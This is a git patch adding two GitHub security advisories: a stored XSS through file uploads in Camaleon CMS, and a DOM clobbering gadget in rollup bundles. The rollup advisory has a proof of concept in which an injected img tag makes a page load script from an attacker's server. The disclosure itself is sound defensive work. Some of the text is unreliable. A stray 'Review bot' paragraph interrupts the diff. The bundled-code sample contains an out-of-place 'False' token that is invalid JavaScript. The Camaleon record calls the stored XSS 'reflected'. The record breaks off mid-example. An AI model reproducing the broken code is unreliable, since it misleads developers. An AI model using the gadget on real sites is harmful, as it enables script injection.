From 8a8eaecd8f6f9aa40427a4004add35d1b9c611c9 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Mon, 23 Sep 2024 22:12:03 +0000
Subject: [PATCH] Publish Advisories GHSA-8fx8-3rg2-79xw GHSA-gcx4-mw62-g8wm
---
 .../GHSA-8fx8-3rg2-79xw.json | 65 ++++++++++++
 .../GHSA-gcx4-mw62-g8wm.json | 100 ++++++++++++++++++
 2 files changed, 165 insertions(+)
 create mode 100644 advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json
 create mode 100644 advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json
diff --git a/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json b/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json
new file mode 100644
index 0000000000000..14443976286a7
--- /dev/null
+++ b/advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8fx8-3rg2-79xw",
+ "modified": "2024-09-23T22:10:33Z",
+ "published": "2024-09-23T22:10:33Z",
+ "aliases": [
+
+ ],
+ "summary": "Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)",
+ "details": "A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf\n(e.g. changing or deleting content inside of the CMS.)\n\n[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106\n[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111\n\n## Impact\n\nThis issue may lead to account takeover due to reflected Cross-site scripting (XSS).\n\n## Remediation\n\nOnly allow the upload of safe files such as PNG, TXT and others or serve all \"unsafe\" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.\n\nAdditionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)\n\n[3]: https://web.dev/articles/csp\n\nTo prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. 
Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "RubyGems",
+ "name": "camaleon_cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.8.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/owen2345/camaleon-cms"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-09-23T22:10:33Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json b/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json
new file mode 100644
index 0000000000000..4f100763f6f5a
--- /dev/null
+++ b/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json
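Review bot: The "## Impact" paragraph inside the `details` string of GHSA-8fx8-3rg2-79xw contradicts the rest of the record: it attributes the account takeover to "reflected Cross-site scripting (XSS)", while the `summary` and the opening sentence of `details` describe a stored XSS delivered through uploaded SVG/HTML files, and `cwe_ids` (`CWE-79`) does not disambiguate. Anything downstream that displays `details` will carry this misclassification, so the sentence should read `This issue may lead to account takeover due to stored Cross-site scripting (XSS).` A minor formatting point that applies to this file and to GHSA-gcx4-mw62-g8wm.json in the next hunk: both end with `\ No newline at end of file`; a terminating newline is the usual convention for version-controlled JSON and keeps future diffs of these records clean.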
@@ -0,0 +1,100 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gcx4-mw62-g8wm",
+ "modified": "2024-09-23T22:11:02Z",
+ "published": "2024-09-23T22:11:02Z",
+ "aliases": [
+ "CVE-2024-47068"
+ ],
+ "summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS",
+ "details": "### Summary\n\nA DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nA DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. 
In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. 
The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\n\n
\n